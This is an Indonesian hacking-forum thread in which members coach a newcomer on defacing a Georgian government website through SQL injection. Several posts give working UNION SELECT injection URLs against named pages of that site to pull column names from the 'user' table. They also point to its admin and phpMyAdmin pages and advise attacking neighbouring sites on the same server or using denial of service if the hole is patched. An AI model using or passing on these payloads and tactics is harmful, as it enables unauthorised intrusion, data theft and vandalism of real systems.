ask : cara terusin deface

[shinichi81]

Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:

[Xshadow]

Code: Select all

http://www.dotr.gov.ge/geo/news.php?id=-99+union+select+1,2,group_concat(column_name),4,5,user(),7,8+from+information_schema.columns+where+table_name=0xhexa--

table_name=0xhexa--

baca tutornya sekali lagi yang saya tebelin dan berwarna merah itu apa... tolong dibaca dengan jeli tutorialnya
nech buat kamu
baca dengan baik ya...

Code: Select all

http://www.forkliftpartsmanual.com/anu.html

buka tuh halaman

[ecko]

Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:

itu web kyanya udh di patch deh....kaga bisa login ke adminnya :
http://www.dotr.gov.ge/admin/

:mati: :mati: :mati:

[3xtr3m3b0y]

itu web kyanya udh di patch deh....kaga bisa login ke adminnya :
http://www.dotr.gov.ge/admin/

:mati: :mati: :mati:

Bukan dipatch, halaman Admin gak bisa konek ke Database Server.
Ada halaman menarik neh http://www.dotr.gov.ge/phpmyadmin/

[shinichi81]

kalau udah di patch,bagaimana cara inject-nya lagi yah?? sepertinya beda caranya yah?? bisa diberi tutor bos,kalau mo inject web yang udah di patch :kaca: :kaca:

[3xtr3m3b0y]

Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:

Pada bagian table_name gak perlu pke bilangan HEXA, cukup pke STRING aja, karena directive magic_quotes_gpc = off, sehingga kita bisa menggunakan STRING.

Untuk mengeceknya :

Code: Select all

http://www.dotr.gov.ge/eng/news.php?id=-99+union+select+1,2,3,4,5,'test pke string',7,8--

Jika kemudian gak error 'n muncul teks test pke string, maka kita bisa menggunakan string.

Jadi alamat URL sebelumnya akan seperti ini :

Code: Select all

http://www.dotr.gov.ge/eng/news.php?id=-99+union+select+1,2,3,4,5,group_concat(column_name),7,8+from+information_schema.columns+where+table_name='user'--

[3xtr3m3b0y]

kalau udah di patch,bagaimana cara inject-nya lagi yah?? sepertinya beda caranya yah?? bisa diberi tutor bos,kalau mo inject web yang udah di patch :kaca: :kaca:

Jika halaman/file yg vuln sdh dipatch, kita bisa mencoba mencari halaman lain yg mungkin belum dipatch, atau dengan mencari jenis vuln lain yg mgkn ada pada web tsb. Klo ternyata sdh dipatch semuax, kita coba dgn teknik JUMPING ATTACK, kita ambil alih web lain yg satu server dgn web tsb, lalu coba masuk ke lokasi web target sebelumnya. Jika ternyata gak bisa juga 'n kita ttp kekeh buat matiin tuh web, bisa coba pke teknik DoS.

Mgkn teman yg lain bisa nambahin teknik ilmiah apalagi yg bisa kita gunakan...

[shinichi81]

makasih suhu2,jadi bertambah nih ilmunya :love: :love: :love: eh bos,kalau teknik JUMPING teh apaan yah :malumalu: :malumalu: :malumalu:

[Xshadow]

pelajari 1-1... kalo dah kelar baru bahas yang lain...

[shinichi81]

pelajari 1-1... kalo dah kelar baru bahas yang lain...

Siap Bos Xshadow,nanti saya coba oprek lagi hehehe....Bos,kalau 1-1 teh apaan? atau maksudnya dari tahap pertama dilang lagi yah cari yang belum di patch :pusing: :pusing: :pusing: